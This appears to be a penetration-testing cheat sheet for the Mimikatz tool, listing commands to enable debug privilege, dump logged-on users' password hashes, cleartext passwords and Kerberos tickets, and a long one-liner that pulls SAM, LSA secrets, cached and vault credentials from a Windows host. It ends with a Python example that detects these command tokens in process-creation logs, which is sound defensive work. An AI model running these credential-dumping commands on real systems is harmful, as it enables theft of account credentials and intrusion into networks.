mimikatz Tool
Fetching Cached AD Credentials
Run all Command
dcsync attack
# To run mimikatz we need SYSTEM user access.
# Below are the commands that we can use in mimikatz.
# You can clone mimikatz from the git repo below.
git clone https://github.com/ParrotSec/mimikatz
# or search in kali linux
locate mimikatz.exe
# Engage the SeDebugPrivilege privilege, which will allow us to interact with a process owned by another account.
privilege::debug
# dump hashes for all users logged on to the current workstation or server, including remote logins like Remote Desktop sessions
sekurlsa::logonpasswords
# From this output we can find the NTLM hash, which can be used to connect to the system later.
# When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.
-------------------------
# Other way:
# Example:
# List the SMB share.
dir \\web04.corp.com\backup
# A ticket will be generated and saved. We can fetch the ticket using the command below:
sekurlsa::tickets
cmd.exe /c "mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords exit > output.txt"
.\mimikatz.exe "privilege::debug" "token::elevate" "log" "lsadump::sam /patch" "lsadump::sam" "sekurlsa::msv" "lsadump::secrets" "lsadump::lsa" "lsadump::lsa /patch" "lsadump::cache" "sekurlsa::logonpasswords full" "sekurlsa::ekeys" "sekurlsa::dpapi" "sekurlsa::credman" "vault::list" "vault::cred /patch" "exit"
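
The detection side of the commands above, as an added example that is not part of the original page: a Python check that flags process-creation command lines (such as those recorded by Windows Event ID 4688 with command-line logging, or Sysmon Event ID 1) containing the module::command tokens listed here. It matches on arguments rather than on the image name; the function names and the sample events are constructed for illustration.

```python
import re

# Module names taken from the commands listed on this page.
MODULES = ("privilege", "token", "sekurlsa", "lsadump", "vault")
CREDENTIAL_MODULES = ("sekurlsa", "lsadump", "vault")

# Matches module::command pairs such as sekurlsa::logonpasswords, quoted or not.
TOKEN_RE = re.compile(r"\b(%s)::([a-z]+)" % "|".join(MODULES), re.IGNORECASE)


def mimikatz_tokens(command_line):
    """Return the sorted, lower-cased module::command tokens in a command line."""
    found = {f"{m.lower()}::{c.lower()}" for m, c in TOKEN_RE.findall(command_line)}
    return sorted(found)


def classify(command_line):
    """Return (severity, tokens) for one process-creation command line.

    high   : a credential module (sekurlsa, lsadump, vault) is invoked
    medium : only preparation commands (privilege::debug, token::elevate)
    none   : no module::command token present
    """
    tokens = mimikatz_tokens(command_line)
    if any(t.split("::")[0] in CREDENTIAL_MODULES for t in tokens):
        return "high", tokens
    if tokens:
        return "medium", tokens
    return "none", tokens


def scan(command_lines):
    """Return (severity, tokens, command_line) for every line that matched."""
    hits = []
    for line in command_lines:
        severity, tokens = classify(line)
        if severity != "none":
            hits.append((severity, tokens, line))
    return hits


# Constructed sample command lines, not real telemetry.
SAMPLE_EVENTS = [
    'cmd.exe /c "mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords exit > output.txt"',
    r'C:\Temp\tool.exe "Privilege::Debug" "LSADUMP::SAM /patch" "exit"',  # image name differs
    'mimikatz.exe "privilege::debug" "exit"',
    r'cmd.exe /c dir \\web04.corp.com\backup',  # benign share listing
]

if __name__ == "__main__":
    for severity, tokens, line in scan(SAMPLE_EVENTS):
        print(severity, tokens, line)
```

A token match on the command line only covers interactive or scripted invocations like the ones on this page, so treat it as one signal alongside LSASS process-access monitoring.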